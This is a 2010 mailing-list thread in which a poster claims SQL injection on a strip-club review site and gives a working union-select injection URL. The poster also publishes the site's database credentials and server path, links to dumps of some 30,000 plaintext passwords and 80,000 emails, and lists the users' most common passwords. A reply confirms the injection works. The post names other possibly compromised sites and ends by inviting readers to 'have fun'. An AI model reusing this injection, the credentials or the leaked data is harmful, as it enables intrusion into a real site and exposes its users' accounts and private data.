Date: Fri, 3 Sep 2010 20:37:56 +0000
From: Ben <iluv2cane@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Tuscl.net SQL injection with 30k Plain Text
 Passwords & 80k Email list

worked in firefox....
if you see the title bar stating 3,8
thats the union select ;)
also per this page: http://www.tuscl.net/contact-login.php

Recently we lost a week's worth of user data. We believe it was the work of
hackers, and have tightened our security measures.


On Fri, Sep 3, 2010 at 8:32 PM, Jhfjjf Hfdsjj <taser3000@...oo.com> wrote:

>
> Well, one thing I will point out is that the link you submitted for the
> actual SQL injection doesnt seem to work. Either they fixed it or you messed
> up the link.
> ------------------------------
> *From:* Ben <iluv2cane@...il.com>
> *To:* full-disclosure@...ts.grok.org.uk
> *Sent:* Fri, September 3, 2010 11:09:04 AM
> *Subject:* [Full-disclosure] Tuscl.net SQL injection with 30k Plain Text
> Passwords & 80k Email list
>
> I found many sql injections on Tuscl.net (The ultimate strip club list)
>
> I tried notifying the site, no response. The server is ran on a vmware. So
> anything that is done to it is restored, apon reboot.
>
> This is a dump of usernames passwords and emails for the site. They are in
> plain text. I have removed records that had the system generated password
> that the user never changed.
>
> http://tinyurl.com/397rzqs
> http://bit.ly/bkVnPY
> http://is.gd/eTqna
>  http://jump.fm/FOJRO
> http://www.mediafire.com/?l6i1vd25il61a6b
> http://www.megafileupload.com/en/file/265174/users-sql-zip.html
>  http://www.4shared.com/file/w0qqRyDf/userssql.html
> http://rapidshare.com/files/416858410/users.sql.zip
>  http://rapidshare.com/files/416860069/users.sql.zip
> http://www.speedyshare.com/files/24097837/users.sql.zip
>  http://uploading.com/files/e1741mm9/users.sql.zip/
> http://bit.ly/cFvd8B
> http://is.gd/eTsn5
>
>
>
> http://www.tuscl.net/c.php?CID=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
>
> Common Passwords and the number of accounts that shared them
>
> password - 269
> 123456 - 173
> tuscl - 84
> stripper - 67
> qwerty - 62
> 12345 - 49
> 12345678 - 47
> 1234 - 42
> baseball - 36
> monkey - 36
> princess - 34
> stripclub - 33
> strip - 32
> jennifer - 32
> abc123 - 32
> mustang - 31
> pussy - 29
> lapdance - 27
> andrew - 27
> jmh1978 - 27
> letmein - 27
> fuckyou - 27
> 696969 - 27
> michelle - 26
> harley - 25
> dallas - 25
> 111111 - 25
> shadow - 24
> corvette - 24
> trustno1 - 24
> sunshine - 22
> dragon - 21
> jordan - 21
> love - 21
> butthead - 20
> batman - 20
> danielle - 20
> buster - 20
> password1 - 20
> hello - 20
> biteme - 20
> gaydar - 20
> Michael - 19
> george - 19
> hockey - 19
> ginger - 19
> 6969 - 19
> Bandit - 19
> lasvegas - 18
> taylor - 18
> tigger - 18
> yankees - 18
> chicago - 18
> fucker - 18
> blahblah - 17
> football - 17
> 1escobar2 - 17
> 1111 - 17
> Jessica - 17
> 123456789 - 16
> testing - 16
> phoenix - 16
> badboy - 16
> gemini - 16
> ranger - 16
> heather - 15
> gateway - 15
> secret - 15
> welcome - 15
> 654321 - 15
> aaaaaa - 15
> tennis - 15
> asshole - 15
> maggie - 14
> pepper - 14
> charlie - 14
> golfer - 14
> strippers - 14
> redskins - 14
> summer - 14
> peanut - 14
> chicken - 13
> jeremy - 13
> hunter - 13
> m0ntlure - 13
> fuckoff - 13
> dancer - 13
> bitch - 13
> lucky - 13
> whatever - 13
> killer - 13
> prince - 13
> robert - 13
> orange - 13
> thomas - 13
> hawaii - 12
> redsox - 12
> tiger - 12
> titties - 12
> gators - 12
> Password - cnt
> florida - 12
> kitten - 12
> austin - 12
> merlin - 12
> canada - 12
> diamond - 12
> boston - 12
> master - 12
> yellow - 12
> falcon - 12
> jasmine - 12
> 1234567 - 12
> cookie - 12
> superman - 12
> midnight - 12
> blowme - 12
> jackass - 12
> sparky - 12
> peekaboo - 11
> doctor - 11
> brandy - 11
> 8675309 - 11
> madison - 11
> braves - 11
> brooklyn - 11
> money - 11
> anthony - 11
> samantha - 11
> ashley - 11
> lucky1 - 11
> amanda - 11
> booboo - 11
> SOCCER - 11
> tarheels - 11
> bigdog - 11
> pookie - 11
> private - 11
> tiffany - 11
> martin - 11
> silver - 11
> lakers - 10
> eatme - 10
> junior - 10
> platinum - 10
> sex - 10
> iloveyou - 10
> nicole - 10
> vegas - 10
> wolfpack - 10
> 55555555 - 10
> barney - 10
> melissa - 10
> molly - 10
> passw0rd - 10
> sexy - 10
> nascar - 10
> dietcoke - 10
> chris - 10
> boomer - 10
> test123 - 10
> johnny - 10
> red123 - 10
> asdfgh - 10
> ncc1701 - 10
> 314159 - 10
> internet - 10
> jackson - 10
> computer - 10
> peaches - 10
> horny - 10
> sierra - 10
> rush2112 - 10
>
> Here is the complete list of email addresses registered. The site had no
> validated so, I am sure, some are fake.
>  http://www.tuscl.net/emails.zip
> http://rapidshare.com/files/416871314/emails.zip
>  http://www.mediafire.com/?67rzfbvmyr1c492
> http://www.speedyshare.com/files/24098846/emails.zip
> http://www.megafileupload.com/en/file/265210/emails-zip.html
>
> The path to the working directory is: /home/httpd/vhosts/
> tuscl.net/httpdocs/
>
> The SQL information is
> "localhost" - "tuscl" - "szg4wpl9"
>
> Also if you want to look at all the nudey photos uploaded here is where
> they are
> http://www.tuscl.net/pictures/
>
> There are other sites that could have been comprimised as well:
> vanjonesthinksimanasshole.com
> tuscl.com
> onerun.com
> ecampguide.com (contains another 1200 plain text passwords)
> troopedge.com
>
> Well have fun!
> Owner or media if you want get ahold of me:
> auto595158@...hmail.com
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists